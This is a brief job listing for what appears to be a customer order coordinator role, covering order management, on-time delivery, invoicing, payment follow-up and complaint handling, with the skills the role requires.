Responsibilities:
• Managing customer order process
• Coordinate with production and logistic teams in delivering customer order
• Ensure high level OTIF (On Time In Full)
• On-time submission of Invoice
• Constant follow up on payment and debt monitoring
• Manage customer complaints & follow through to resolution with support from superior
• Maintain high level of customer satisfaction
• Assist in maintaining customer database
• Flagging any major issues with the superior

Requirements:
• Work well in a team environment
• Able to manage and control all tasks
• Intermediate / Advance Microsoft office skills
• Excellent communication skills
• Experience being accountable for delivering to deadlines
• Enjoy working in a sales / fast paced, lively environment
